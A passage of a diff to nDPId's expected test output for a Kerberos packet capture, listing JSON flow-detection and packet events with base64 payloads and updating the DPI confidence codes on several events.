gWBK4kWlSfWhwHwDob09dR24nAmYkaTEvrRnFvLOPKhepgPz5FiL+TNVO0x7Q9MEcpXED6nxJ9fgUpL+5AL+5zKjvBqGhTBSFztV5n2jwS9BN5nwKGyQXNwz7M3IugClC01JUeDu8ccEtCesL+sdsbL1EP7jcFCC1EniPRKxntY82esVy8lyQlrXBxmBdMcKVUa21imq65LZV0MJEQvFPcKWd3cpqWETjO2y3rGD5HXk8dwPDck3LvUU56PaEiLP3SNlqGRnDfEXoiRxz6YMXMhdwJMRbqAQJYa71fsqMLgQ4u3s5WkgZwwgZmgAwIBEqKBkQSBjkBvFbBksZRBZsgqvT9rWZWIMz104YLf86+Cksa0ZMsEGJ\/RDcCZOr8kPQRKlwzkm2uQjqkaOemu4sYhWXYr71KrOEs2JUveeWW4HHkLaYXd0a2yOtTAVV1zR76rPVw3Om2DZiy3OdOJiQuRn3tY6sCbzkX\/gKz0r0nI8miItgy4uzP0Z9rEEUiiCUR\/XkOkdTBzoAcDBQBAgQAAohAbDkhBUFBZQ1JBRlQuT1JHoycwJaADAgEKoR4wHBsaam9obnNvbi1wYyRASEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE44sbqoEjAQAgESAgERAgEXAgEYAgL\/eQ=="} -00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7580000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"thread_ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} +00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7580000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"thread_ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1549337931211,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1549337931211,"pkt":"AAgCHEeupB9ywglqCABFAAXUE2tAAIAGeMesEAgIrBAIyQBYwBNIHXnmqOSkjlAYAQDmlQAAAAAFqG2CBaQwggWgoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIEOGGCBDQwggQwoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiJzAloAMCAQqhHjAcGxpqb2huc29uLXBjJEBIQVBQWUNSQUZULk9SR6OCA+wwggPooAMCARKhAwIBAaKCA9oEggPWM37115K3Hp8wZkASHyq+pZzCB52w4ZkoKvxkfuUu0LiaHFeH\/YmBkYuC+Y2vHUb50xj2RvlJ0VUIhZ76+RSlQ21W8ccYNaNUXAdabNdF58x1VLmlxuTxbWyuhApe3nart0yE2ggJlqq+SXunnCj4pybyo3D5UqYJsd2CPwW\/UrYMlNJN1gTQgtBaL+rVhNBO6KW9AYxQ1t3V4\/aN5W98Rm9mtqvqy8JlwwSbsqtA+fkgyuLhaFI64sFXeg2okoVY+WpiV8y69YH3VrH9iOYXgjNBApUv8XW3Inwsdd+FJTBLBvDWG4tGHW9DGxqpa+jzaFQyiDi46S1MFPNG5ax\/fXZRFVyIKm5Uvcg+IVoFoTv79M+o2izKZu3xW5GT3jmX5joC1Jz2cBBvfj31IPUawr97kChTt3baVrRO5jtj4Qe\/Yf9D1ea6AnOL3m9lXfbWlkiRMtogdbiLBmz40fY6y7s2fBoNzUM7PPtzjMCZD+mzFnuxbn6SKFsq1jRXr1gfhz99U\/sj4rpgf0fGzuAji6\/CldJydoJ3ZF35EbOHxlT67B0T5Wdz2DSGMxMFnFTU2y41IZZAFsQkozjJDlJyV\/H3UNEgpsuzFWCdn70SJWivzXQmU387\/5qoLQgDt1DzqhRxVq84eAlKWowli8llAVqtdeTmpgPePJrGuN8afpBvekjwt\/1CNWyg0EdZHQFfl1jlAEsgIyCski92E8xu8mvOhuDWTPYemtkOSb2FcxtoxHDyT\/GouX7ARs1ZykSB8j3R9t9ImA7xedyZ34sFfJFGRcLyx6qpTKqFmVZRuxhX4QxBOD\/ubH8xUJ\/p2KhM0jR1yUcK5cyCfymWcxTybrHYNySjaI0gUlhRAiWvZM8bRaCC8Fvoak+VMcqFAYw\/ve5dkR7KuJ\/TxqmhnlpwuoDkayoCpyiqZLALWWLzMuA+erM0osdjgnLPkazewgaOuGK+L14eoN40NcSEI4LVjIf3MizcDep1bu4x++f34uKnDRQCxEnEkfmry2Kt7UmB9dRWUyMnIhre\/LcHyWzVYKmQzK4jbAZGQz3E7SgAtaF8YpuFzK+wN7Al3\/bnw+mNGEv8UnWesnu6eYSeTafPkSExr0eHjyMGHylq1SYGRDikN47BEUJ9DRohxwo4GIbZJ4SlXZm2o1CyYrdjxESgLw7oBxv5ojM77+mqWLxxRYcXrNOO62jI7OC10ISrQjw9VRI73l6ie75xGP23mwgzTkWksp2AmXFXEibjsoWoxN\/dqkJ1paHMQ4D49jni4b2qEd7LE7wiCkMzEEz1wgpM028xFWhhGKaCASowggEmoAMCARKiggEdBIIBGXjHjK5feQ4HY+O2QW1CcrS7y98xjbx4G5\/F1UdYW0nRFrJ1ea7DBhGVKjGhvpNRa\/suoiAGgMaTxIusGGUQaAV3QBkZHI2P7w3S90dRv87TwzBiyLZFov6Iyju+rGIOEBeNij1u4+ieA37sl1WxkkeY5PDSqYQ0xi5dzSQDh1ZKJZF1swmboJUdCNAO5zs9II914vVd0a+gpHqPPfi\/aa\/2ENYesIfYc445XBAksieN4OCiUuXDZetEyUARPhuFnigdmrFcLiKa7lrUb+XOxw\/TpGzrNeFBj3QXNS06SOOdTL3pwlP77\/SR+78shwDam4sOlgv2UEV2H31TfNEKJs\/OC4Ks1WD8+3srLETa3NVngdje5im6AaSi"} -00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7580000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} +00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7580000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931211,"flow_last_seen":1549337931211,"flow_idle_time":7580000,"flow_min_l4_payload_len":1064,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1064,"flow_avg_l4_payload_len":1064,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1549337931211,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1118,"pkt_l4_len":1084,"thread_ts_msec":1549337931211,"pkt":"pB9ywglqAAgCHEeuCABFAARQAIFAAIAGjTWsEAjJrBAICMAVAFjnnRKZiyMmn1AYAQD\/uwAADkhBUFBZQ1JBRlQuT1JHoicwJaADAgEKoR4wHBsaam9obnNvbi1wYyRASEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQGiggPaBIID1jN+9deStx6fMGZAEh8qvqWcwgedsOGZKCr8ZH7lLtC4mhxXh\/2JgZGLgvmNrx1G+dMY9kb5SdFVCIWe+vkUpUNtVvHHGDWjVFwHWmzXRefMdVS5pcbk8W1sroQKXt52q7dMhNoICZaqvkl7p5wo+Kcm8qNw+VKmCbHdgj8Fv1K2DJTSTdYE0ILQWi\/q1YTQTuilvQGMUNbd1eP2jeVvfEZvZrar6svCZcMEm7KrQPn5IMri4WhSOuLBV3oNqJKFWPlqYlfMuvWB91ax\/YjmF4IzQQKVL\/F1tyJ8LHXfhSUwSwbw1huLRh1vQxsaqWvo82hUMog4uOktTBTzRuWsf312URVciCpuVL3IPiFaBaE7+\/TPqNosymbt8VuRk945l+Y6AtSc9nAQb3499SD1GsK\/e5AoU7d22la0TuY7Y+EHv2H\/Q9XmugJzi95vZV321pZIkTLaIHW4iwZs+NH2Osu7NnwaDc1DOzz7c4zAmQ\/psxZ7sW5+kihbKtY0V69YH4c\/fVP7I+K6YH9Hxs7gI4uvwpXScnaCd2Rd+RGzh8ZU+uwdE+Vnc9g0hjMTBZxU1NsuNSGWQBbEJKM4yQ5Sclfx91DRIKbLsxVgnZ+9EiVor810JlN\/O\/+aqC0IA7dQ86oUcVavOHgJSlqMJYvJZQFarXXk5qYD3jyaxrjfGn6Qb3pI8Lf9QjVsoNBHWR0BX5dY5QBLICMgrJIvdhPMbvJrzobg1kz2HprZDkm9hXMbaMRw8k\/xqLl+wEbNWcpEgfI90fbfSJgO8Xncmd+LBXyRRkXC8seqqUyqhZlWUbsYV+EMQTg\/7mx\/MVCf6dioTNI0dclHCuXMgn8plnMU8m6x2Dcko2iNIFJYUQIlr2TPG0WggvBb6GpPlTHKhQGMP73uXZEeyrif08apoZ5acLqA5GsqAqcoqmSwC1li8zLgPnqzNKLHY4Jyz5Gs3sIGjrhivi9eHqDeNDXEhCOC1YyH9zIs3A3qdW7uMfvn9+Lipw0UAsRJxJH5q8tire1JgfXUVlMjJyIa3vy3B8ls1WCpkMyuI2wGRkM9xO0oALWhfGKbhcyvsDewJd\/258PpjRhL\/FJ1nrJ7unmEnk2nz5EhMa9Hh48jBh8patUmBkQ4pDeOwRFCfQ0aIccKOBiG2SeEpV2ZtqNQsmK3Y8REoC8O6Acb+aIzO+\/pqli8cUWHF6zTjutoyOzgtdCEq0I8PVUSO95eonu+cRj9t5sIM05FpLKdgJlxVxIm47KFqMTf3apCdaWhzEOA+PY54uG9qhHeyxO8IgpDMxBM9cIKTNNvMRVoYRg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931211,"flow_last_seen":1549337931211,"flow_idle_time":7580000,"flow_min_l4_payload_len":242,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":242,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -64,9 +62,9 @@ 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1549337931219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337931219,"pkt":"AAgCHEeupB9ywglqCABFAACbE31AAIAGfe6sEAgIrBAIyQBYwBcKhDl3bkbwtVAYAQD\/bQAAzmwvcX+5XppDtJZXr9PwDYLsp98Hk08TTktA1oPPxQHxyFPFFH6C9d30u8d8saioSDapQyKHHyGt004ct60erCJP9bUby12IBGHwYva7Ha2y2bxZxEn3nV+8BQON\/a2dluoxZFHPI4urPpSWS9H8dnzG6Q=="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02396{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1549337931219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1485,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1485,"pkt_l4_len":1451,"thread_ts_msec":1549337931219,"pkt":"pB9ywglqAAgCHEeuCABFAAW\/AJNAAIAGi7SsEAjJrBAICMAYAFg1TYdzLuLg4VAYAQBQtwAAAAAFk2yCBY8wggWLoQMCAQWiAwIBDKOCBRcwggUTMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1hKWdXqL0IxSnZlxRjhHmIFUVS3rvb7i9fEBKrEJ5PVjDXxsAQeDmTL9wweNNg1pCQDRmZ6AE\/m2Y7TGJV\/FdJF\/GLAs\/UE5nC+H+eLE4iuLtnFkH3govXIWXOdlEsqQhROyd4qj2WtH7bxyzZwdtdBzD8HNk\/Zyhfmgmp+oA1+8nXeYYFDFKmqTt9a00HvvmTpJfi0pguIgxY8KmJbF4d1RUkWNuXZ5g7FA43R8i0OyHjh+mwSGoE1gJ\/X8DroluAfskaOHhGVguFx+famY4o8UsY6g4BojHiLERbIlzMsUYRq\/EQf2FuSw8Wc3swODADnnHqoAdpFJG5\/GMQbUUUhsHy5eDXa3\/EPT1ZKqI0bJsr7jOF5G9ytS8thT6E7bOOCcOFN4JNFsCA3bCyRL6jYH2ZedtZMr5yCI40ePAHAaIBbEPTKYDMpCUKxXExG41vrN6dY4CEFLw2Tb4BDinhxjESAIpIw6LOtdRzBrkjiFKjPEj4UBorlhX90DmWgF5dFJbZXz5eOVcZ\/qmOnm8JcuVim8byzO3C2W5go47U+8GNRvk\/iuaoCs18MAuzn4DOtJmgk1eSuxxL9sUZmjkqejNSB6Ny8aYGysoT\/tUR2mS\/10DyxEUb\/M23KvW\/d0nkBg7qCjWXvlLjMDmACl3rd8MXcyqYWqmZcwKWLk5yL3YiZbL90SxemnQHTIY+DWavybHj9SrM5+aINDzqHcDq0aHAhhwNPUOQQH+m0ab759iCYVNaTyITpTWuG6hneFvKoU9d3uSafxpBU5TJfC9PTmhW+\/db+6ouEM0JlNTrwSmfDpaJJPc+gkzn45Pl5k\/7+Abb+s6rWMNfHT+Em3MBbZJYdM0UlQ1xrel8YuJnwOOGyF4x2puehNGP\/\/\/ouwl65KT\/CBdxNVmhdbElBMgwiINySCK0GaA0G8iJuo2p3q21Z3q6PwC\/TBFuSNBvRRaLYdHeXUMMCTZUjjLBHDUqLGGPYiG40kPfZcBzP2U1v\/9gWBK4kWlSfWhwHwDob09dR24nAmYkaTEvrRnFvLOPKhepgPz5FiL+TNVO0x7Q9MEcpXED6nxJ9fgUpL+5AL+5zKjvBqGhTBSFztV5n2jwS9BN5nwKGyQXNwz7M3IugClC01JUeDu8ccEtCesL+sdsbL1EP7jcFCC1EniPRKxntY82esVy8lyQlrXBxmBdMcKVUa21imq65LZV0MJEQvFPcKWd3cpqWETjO2y3rGD5HXk8dwPDck3LvUU56PaEiLP3SNlqGRnDfEXoiRxz6YMXMhdwJMRbqAQJYa71fsqMLgQ4u3s5WkgZwwgZmgAwIBEqKBkQSBjoWrS7jR3\/ZxrmkklAr5M\/UVPgZBz\/I0MBRDSrLAPTWRtuq1ZhbBTvDmh4JfIoeW\/NN+j\/BIs99fVl1IARv5kJzlvsrT0oz2PdU+R8Rl10wOzwJfT7yBOJecNjJCW1XhiL9p6LojffFaim+4jvn\/X89SbhRBqPbpCCF+yHmow+h4iZkD+HM6Jz3YsaIdiuQwDqEEAgIApaIGBAQfAAAApGQwYqAHAwUAYIEAEKIQGw5IQVBQWUNSQUZULk9SR6MjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE44s3moBTADAgES"} -00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} +00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} 02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1549337931220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"thread_ts_msec":1549337931220,"pkt":"AAgCHEeupB9ywglqCABFAAXME4FAAIAGeLmsEAgIrBAIyQBYwBgu4uDhNU2NClAYAQBUPQAAAAAFoG2CBZwwggWYoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIENGGCBDAwggQsoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHo4ID7DCCA+igAwIBEqEDAgECooID2gSCA9aIPBwtNxkshczHziSeGRCcSiSC82vdTNNxZoZEqctTILmi\/cPiWo2kj2ZowTM5BfoTzgngU5zy1dblxSYtNNDo790fqKeln68pSwduOA5ekfZ2omIpLyTKi1Uzi5unXScqqLz0hKSsn\/40+2FcuWZE3ZvPuCmZ8SKPEnuc921KBrNqOj\/0DryAdSyI8er0AkE463j84WxyAtyNQDKDrp2ez6929oR6Rx5hbvL8GdKQY9jCLD2rnICMW89Hj9rOupV1OeH78XxxB7MSKm499oGFFneF9SM8YJwXSSMV673PLXubFj6DMrikD2G0Sl6xic8MhWvEbY+QDRNnfGPZAJvMaahqCk8wVuJCt+fkFop+b4toNRK\/McSX15qS4Oue1FamxPlWb8yeZyA7zxXMdyv\/9YdFl51KW6DMdV\/gNQhWVbNsnpHVbk+dZ3hmZuA13vS+pCaVgYWcY8TsTrrqDHUdvkhYH5y6bQXhaba0hTe8Bpqjtkm6\/RTu4J\/\/NKiUQMb9AOVNXKtDTvIFCVxCzbgDhWofcnihAdfiq3GVUSfoJVIjvbiKN6rurAhxZ5G7eeGZ0k0F7hodA7NNCDg1db\/i3Z0nn0sEe0z7aNhzE0ribx16c5Vcg7SzYKcbmYr2SOlrqyDG2wBIue4c+yHf8w4ERFzFfLLBAoUF6TY9mRoNRbKB\/qSAwbDd52vGpnn87rIVg\/QNGVIwMeb1KKPfdaC4wum+6\/FhZgWd0DbrZEhIXl\/8HN6zG+3ywmGFdeC2DFCmO4dETOrfkL6fl3T\/7ku0etROu1j+k26SXEG6Gge01yPUKju51MrjdtHnDZ1Ss42MB0XlUT6U6S5TlEIP\/8k9d0krm1cn0oRERln+NBIaJS\/B2711LZddv4tje7ItSqfXLacjoI7g80JWdXjf4l7SPcZiNeEbp1dMmXrQFZcbRN17kosEr4Tm2W4friYde8+zbAKqoXvVJXbnxAUwEVAGcV\/iPptIl\/xW9mtB0WPhDmkKXm2SfL9rih8OBbowoKkOmIJqQw8CRJRncVK0szyJok+ajlBHDiJgpcZUT8EmfmEr0qJ0qoMeuCqxs8Kf3IstAtgMR7lMBZda98WMq0J06Prxf9X\/7Sw5XHFF0Ihx2VyWiVN3DmzgADoDdivNlyaD8+Octjfvk+ZwiZGCsRMD1d7AL6HjQzrju4nysDHJIjeaKR52nWtCWAZ87qog1mDH+qjQPdMGkDr1FGrVbBXAZcR0K17tOKTw9bgQg9LvLMWeDMDNCEwvA8GHdr\/fAsBPK3PDKVyht8oNdhjar8xKOZRvwzCOpoIBJjCCASKgAwIBEqKCARkEggEVYp6jTcDi\/gYVd9SDuEsi2VccBape1lXgcuGoeWG1ePxV5NidfJvDEi3F2VmdD04JFUaFb\/GRqNe9F8xWyy86xiJ3eKyJgAfyG7DDQnnFCeKC++4ORaBUkKnIeWwsFqQxh0aL1BrdknGP8u06G6P95r9esj7jUPDXQ1D0+jbs1WpWssKqZMQfUgV0eg9FoEGdVPsUmgNbZN2YPPrxhZ6CEgNOIC\/5aj8NqGMkPPX6xfYF4tbD74dZ3EfC4ry5KcIxNVYXU179as2C\/cihpEMrX8yiZtM91awDzQYUMPKt3\/3WSS96ycQo00pex7Pc1Jh3j49Cr5ckyWXD9SUXbCcOpUpip4\/Jz5Hvsliozjm5inKwUIBTJQ=="} -00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} +00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931220,"flow_last_seen":1549337931220,"flow_idle_time":7580000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1549337931220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1549337931220,"pkt":"pB9ywglqAAgCHEeuCABFAAELAJhAAIAGkGOsEAjJrBAICMAWAb2ZMOb++YgxIFAYAP+McAAAQFskZ7b1ZYO5\/CuVOTe3ZqHs3nhqe1KXhnlBtJ\/qDgyo+sduQpC\/WLkmAdUvTJdV+CtGiwLoGf3Uio50ZE6gilnFEbzLLhzMIw4gwhRvlYwapNctw4G2EkpKfWO1MgMQ0yTGVxtfwAuP0ouYkDi\/6FI97AzDGvp\/R2LK19PAI403fVWk1Cbb2O\/YPOGH5a8hHowuR6tT8UugHDdGGl\/fWl8Wk4rCdi\/3gOYAhRVI6o2ZOHpv4GeBlLgJ6L2WL35O3jhh2e2dr0Fkd\/WG3ET2QLw9x3WRfncFn29f8nOqAUQDRH0="} 00809{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1549337931221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337931221,"pkt":"AAgCHEeupB9ywglqCABFAAEsE4VAAIAGfVWsEAgIrBAIyQG9wBb5iDEgmTDn4VAYAP9zWgAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAEAAAAAAAAA\/\/4AAAAAAABdAAAAAAQAAPvWvNgjH\/I48OPxOa5H7a4JAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbUswX\/mwh6g2ztwHi8\/dTRtvFzo0LVENq7tttT0JwVpKoIxijjsysss5HuCbI3DQGU7C0ILmrl+8phtVtu+2vBMSA9FKWe75R\/a+ST6oEaoDrDjzWfPqdU4xUCgD\/zK6J0O4Dsk+rO8nhy4LUmk="} @@ -78,12 +76,11 @@ 